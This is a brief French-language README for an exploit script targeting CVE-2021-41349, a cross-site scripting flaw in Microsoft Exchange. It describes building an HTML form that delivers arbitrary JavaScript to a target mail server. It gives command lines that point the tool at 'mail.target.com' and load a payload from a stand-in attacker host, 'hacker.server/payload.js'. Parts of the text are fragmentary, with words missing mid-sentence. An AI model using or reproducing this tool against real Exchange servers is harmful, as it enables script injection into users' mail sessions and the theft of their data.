
Outil d'exploitation pour CVE-2021-41349 qui génère un formulaire HTML pour délivrer des charges utiles XSS aux serveurs Microsoft Exchange, permettant l'exécution de JavaScript arbitraire.
Exploitation : CVE-2021-41349
Cet outil d'exploitation crée un formulaire pour publier une charge utile XSS sur le serveur Exchange cible.
Vous devez créer un js contenant ce que vous souhaitez faire.
js et téléversez-la quelque part.CVE-2021-41349.py comme suit.python3 CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
ou :
./CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
html sur le serveur.